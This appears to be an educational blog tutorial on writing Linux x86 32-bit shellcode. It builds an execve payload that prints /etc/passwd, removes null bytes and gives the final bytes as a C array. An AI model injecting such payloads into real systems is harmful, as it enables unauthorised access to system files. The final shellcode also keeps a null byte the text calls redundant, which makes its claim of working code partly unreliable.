Shellcode analysis on Linux x86 32bit

Most of the programs that we use every day contain bugs. A bug is a defect in a program that can make it behave in unintended ways or fail. When a bug is a security vulnerability, it can be exploited by a piece of code usually called an exploit. The most common vulnerabilities involve memory corruption, such as buffer overflows, heap overflows and format string attacks, as well as race conditions. In this article we will not learn to write an exploit, nor how to search for vulnerabilities in software; instead, we will see how to write and analyze shellcode and how it relates to the above.

Shellcode is generally regarded as a program that starts a shell, and it is used as the payload of an exploit. In reality, shellcode can do anything a normal program can do. It is executed after the vulnerability has been exploited.

In this article, we will analyze and write shellcode for Linux x86 32-bit architectures.

I specified the architecture because shellcode is usually written in assembly language, and each processor family has its own instruction set. In addition, each operating system has its own system calls for requesting services from the kernel.

On 32-bit x86 Linux, a system call is made with the int 0x80 instruction. The kernel then reads the EAX register to get the number of the requested system call; each system call is identified by a unique number that the kernel recognizes. The arguments of the call are passed in EBX, ECX and EDX.
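The idea that the kernel selects a service by number can also be seen from C. The following is only a minimal sketch, not the method used in this article: it assumes Linux with glibc and goes through the `syscall()` library wrapper instead of a hand-written `int 0x80`, so that it runs on any architecture. The helper name `pid_via_syscall_number` is made up for illustration.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>   /* SYS_getpid and the other system call numbers */
#include <unistd.h>        /* syscall(), getpid() */

/* Hypothetical helper: ask the kernel for our PID by system call number,
 * bypassing the usual getpid() library wrapper. */
long pid_via_syscall_number(void)
{
    long pid = syscall(SYS_getpid);   /* the number selects the kernel service */
    assert(pid > 0);                  /* getpid cannot fail */
    return pid;
}
```

Calling `pid_via_syscall_number()` should give the same value as `getpid()`. Keep in mind that the numbers are architecture-specific: the value 11 used for execve in this article belongs to the 32-bit x86 table.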

The system call numbers in Linux are defined (on Ubuntu) in the following file:

- /usr/src/linux-headers-3.0.0-25/arch/x86/include/asm/unistd_32.h

It's time to start!

Let's write our first shellcode. I have chosen a fairly simple one, to make it easier to follow the steps needed to analyze and optimize it. The shellcode should use the "cat" command to display the contents of the file /etc/passwd (this file contains information about the system's accounts).

[c]

;/bin/cat /etc/passwd

section .data

cmd db '/bin/cat', 0

file db '/etc//passwd', 0

section .text

global _start

_start:

; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)

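mov eax, 11 ; system call number of execve

mov edx, 0 ; envp = NULL

mov ebx,cmd ; ebx = address of "/bin/cat"

push edx ; null pointer that terminates the argv array

mov ecx,file ; ecx = address of "/etc//passwd"

push ecx ; argv[1]

push ebx ; argv[0]

mov ecx,esp ; ecx = address of the argv array

int 80h ; invoke the kernel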

[/c]

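To assemble, link and run the program, and so view the contents of the file /etc/passwd, run the following commands (on a 64-bit system, ld additionally needs the option -m elf_i386):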

[c]

$ nasm -f elf shellcode00.asm

$ ld -o shellcode00 shellcode00.o

$ ./shellcode00

[/c]

As expected, the shellcode shows the contents of the passwd file. Now look at what has been written: the code consists of a ".data" section and a ".text" section. The data section contains the declarations of the variables cmd and file, and the text section contains the code required to run the command "cat /etc/passwd". In particular, it uses the execve system call, which in Linux is used to execute a program. The first argument is a pointer to the string "/bin/cat", the program to execute. The second argument is a pointer to the argument array, which holds the program name "/bin/cat" and the argument passed to it, "/etc//passwd", and must be terminated by a 32-bit null pointer. The third and final argument, the environment, is left empty by passing a null pointer.

The first instruction that we meet is "mov eax, 11"; 11 is the number of the execve system call.
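The three execve arguments described above may be easier to recognize in C. The following is a minimal sketch under the assumption of a Linux system; the function names `build_cat_argv` and `exec_cat_passwd` are hypothetical and only mirror what the assembly does with registers and the stack.

```c
#include <assert.h>
#include <stddef.h>   /* NULL */
#include <unistd.h>   /* execve() */

/* Fill argv the way the assembly fills the stack:
 * program name, one argument, then a terminating null pointer. */
void build_cat_argv(char *argv[3])
{
    assert(argv != NULL);
    argv[0] = "/bin/cat";       /* same string EBX points to */
    argv[1] = "/etc//passwd";   /* argument handed to cat */
    argv[2] = NULL;             /* terminator, pushed via "push edx" */
}

/* Replaces the current process with cat; returns only if execve fails. */
int exec_cat_passwd(void)
{
    char *argv[3];
    build_cat_argv(argv);
    return execve(argv[0], argv, NULL);   /* NULL environment, like EDX = 0 */
}
```

A program that calls `exec_cat_passwd()` from `main` should behave like the assembly version: on success the call never returns, because the process image is replaced by cat.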

We now start debugging with gdb.

We step through the program up to the instruction "mov ecx, esp" and examine the registers ebx and ecx.

We note that the ebx register contains the address of the string "/bin/cat", while the ecx register contains the address of the string "/etc//passwd". Let's also take a look at the stack: from the top, it holds the address of "/bin/cat", the address of "/etc//passwd" and a null pointer.

After the instruction "mov ecx, esp", the ecx register points to this array, that is, to the addresses of "/bin/cat" and "/etc//passwd".

The code we've written has some major problems. The first is the data segment: once the shellcode has been injected into a running program, it cannot know where its variables will be in memory, so the code must be independent of their position in order to run correctly. The next step is therefore to remove the data segment. To do this, use the following instructions:

[c]

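jmp end ; jump over the code to the call

start:

pop ecx ; ecx = address of the string placed after the call

; [code that used the data section]

end:

call start ; pushes the address of the next byte, i.e. the string

db '/etc//passwd'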

[/c]

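This method solves the problem by placing the string immediately after the call instruction. When call executes, it pushes the address of the next instruction onto the stack as the return address; since the string sits exactly there, it is the string's address that ends up on the stack. The pop instruction then takes that address from the stack and places it in a register, in our case the ecx register.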

With this in mind, we change the code (in a new file, shellcode01.asm) as seen below:

[c]

BITS 32

jmp end

start:

; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)

pop ecx

mov eax, 11

mov edx, 0

push 0

push dword 0x7461632f

push dword 0x6e69622f

mov ebx,esp

push edx

push ecx

push ebx

mov ecx,esp

int 80h

end:

call start

db '/etc//passwd'

[/c]

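BITS 32 tells nasm to generate 32-bit code. Note that I decided to build the string "/bin/cat" on the stack: "push 0" supplies the terminating null and, because the stack grows toward lower addresses, the second half of the string is pushed before the first, with the instructions: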

[c]

push dword 0x7461632f ; /cat

push dword 0x6e69622f ; /bin

[/c]
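The two constants are simply the characters of each half of the string, stored in little-endian order. As a rough illustration (the helper name `pack_le32` is hypothetical and not part of the article's code), the values can be reproduced in C:

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: pack four characters into the 32-bit immediate that,
 * once pushed on a little-endian x86 stack, reads back as those characters
 * in order. The first character ends up in the lowest byte. */
uint32_t pack_le32(const char chunk[4])
{
    assert(chunk != 0);
    return  (uint32_t)(unsigned char)chunk[0]
         | ((uint32_t)(unsigned char)chunk[1] << 8)
         | ((uint32_t)(unsigned char)chunk[2] << 16)
         | ((uint32_t)(unsigned char)chunk[3] << 24);
}
```

Here `pack_le32("/cat")` gives 0x7461632f and `pack_le32("/bin")` gives 0x6e69622f, the two immediates used in the push instructions.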

Then run the program in gdb up to the instruction "mov ecx, esp".

At this point the esp register points to the addresses of the strings "/bin/cat" and "/etc//passwd"; after the instruction "mov ecx, esp", the ecx register holds exactly the second argument of the execve function.

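Let us now turn to the second problem, the null byte. Shellcode is often injected through string-handling functions, which treat a null byte as the end of the string and would cut the shellcode short. So we examine the disassembly of the binary file to see whether our code contains any.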

As you can see, there are null bytes in the following lines:

[c]

8048063: b8 0b 00 00 00 mov $0xb,%eax

8048068: ba 00 00 00 00 mov $0x0,%edx

[/c]

This is because eax and edx are 32-bit registers, so the immediate values are encoded as four bytes, while the operation really needs only 8 bits. Using the 8-bit registers al and dl, which are the least significant bytes of eax and edx, avoids the zero padding bytes in the machine code:

[c]

8048069: b0 0b mov $0xb,%al

804806b: b2 00 mov $0x0,%dl

[/c]

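Before doing this, however, you have to clear the full registers, because writing to al or dl leaves the upper 24 bits unchanged. The "xor" instruction does this safely: xor eax, eax sets the register to zero and its encoding contains no null bytes. Note that once edx has been cleared with xor, "mov dl, 0" is redundant, and its encoding (b2 00) still contains a null byte.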
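To make the null-byte problem concrete, here is a small C sketch. It is only an illustration: the helper names `first_null_byte` and `bytes_surviving_string_copy` are hypothetical, and `strlen` stands in for any string function that stops at the first null byte.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Bytes of "mov $0xb,%eax" and "mov $0xb,%al" from the listings above. */
const unsigned char mov_eax_11[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };
const unsigned char mov_al_11[]  = { 0xb0, 0x0b };

/* Hypothetical helper: offset of the first null byte, or -1 if there is none. */
long first_null_byte(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* Hypothetical helper: how many bytes a strcpy-style copy would carry over. */
size_t bytes_surviving_string_copy(const char *code)
{
    return strlen(code);   /* stops at the first null byte */
}
```

For the 32-bit form, `first_null_byte` reports offset 2, and a string copy would carry over only the first two of its five bytes; for the 8-bit form it reports -1, meaning the instruction survives intact.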

Putting it all together, the complete code is (in a new file, shellcode02.asm):

[c]

BITS 32

jmp end

start:

; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)

pop ecx

xor eax,eax

xor edx,edx

xor ebx,ebx

mov al, 11

mov dl, 0

push ebx

push dword 0x7461632f

push dword 0x6e69622f

mov ebx,esp

push edx

push ecx

push ebx

mov ecx,esp

int 80h

end:

call start

db '/etc//passwd'

[/c]

Finally, assemble and link the code, so that the instructions can be listed with their corresponding opcodes (for example with objdump -d):

[c]

$ nasm -f elf shellcode02.asm

$ ld -o shellcode02 shellcode02.o

[/c]

Then we can write our shellcode in the form that we are used to seeing, as shown below:

[c]

char shellcode[] = "\xeb\x1f\x59\x31\xc0\x31\xd2\x31\xdb\xb0\x0b\xb2\x00"

"\x53\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3"

"\x52\x51\x53\x89\xe1\xcd\x80\xe8\xdc\xff\xff\xff\x2f"

"\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";

[/c]
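The jmp/call/pop trick can be checked directly on these bytes. The sketch below is an illustration rather than a disassembler: it assumes the byte string shown above, and the helper names `jmp_short_target` and `call_rel32_target` are hypothetical. It decodes the displacement of the leading short jmp and of the call to see where each one lands.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Copy of the byte string above, with explicit \x escapes. */
const unsigned char shellcode[] =
    "\xeb\x1f\x59\x31\xc0\x31\xd2\x31\xdb\xb0\x0b\xb2\x00"
    "\x53\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3"
    "\x52\x51\x53\x89\xe1\xcd\x80\xe8\xdc\xff\xff\xff\x2f"
    "\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";

/* Target offset of a 2-byte "jmp short" (opcode 0xeb) located at off. */
long jmp_short_target(const unsigned char *code, size_t off)
{
    assert(code[off] == 0xeb);
    return (long)off + 2 + (int8_t)code[off + 1];
}

/* Target offset of a 5-byte "call rel32" (opcode 0xe8) located at off. */
long call_rel32_target(const unsigned char *code, size_t off)
{
    assert(code[off] == 0xe8);
    uint32_t rel = (uint32_t)code[off + 1]
                 | ((uint32_t)code[off + 2] << 8)
                 | ((uint32_t)code[off + 3] << 16)
                 | ((uint32_t)code[off + 4] << 24);
    return (long)off + 5 + (int32_t)rel;
}
```

With these bytes, the jmp at offset 0 lands on the call at offset 33, and the call goes back to offset 2, the "pop ecx" (0x59). The return address pushed by the call is offset 38, which is where the string /etc//passwd begins.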

At this point we have a fully functional piece of shellcode that prints the contents of /etc/passwd.

Conclusion

As we have seen, assembly language is at the heart of effective and efficient shellcode. Shellcode is therefore often created to target one specific combination of processor, operating system and service pack, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors [1].

Therefore, if you are familiar with assembly language and the architecture of operating systems, there is no barrier to limit your imagination.

References

[1] http://en.wikipedia.org/wiki/Shellcode#Platforms

Posted: April 16, 2013

Andrea Sindoni

Andrea Sindoni has 7 years of experience in reverse engineering, malware reversing, software development and research into potential software vulnerabilities. He is very interested in finding bugs and developing low-level exploits (for educational purposes). Sindoni has experience in kernel-mode application development and analysis on Windows and Linux. He also has a great passion for developing scripts (mostly Python) that automate the process of reversing code.
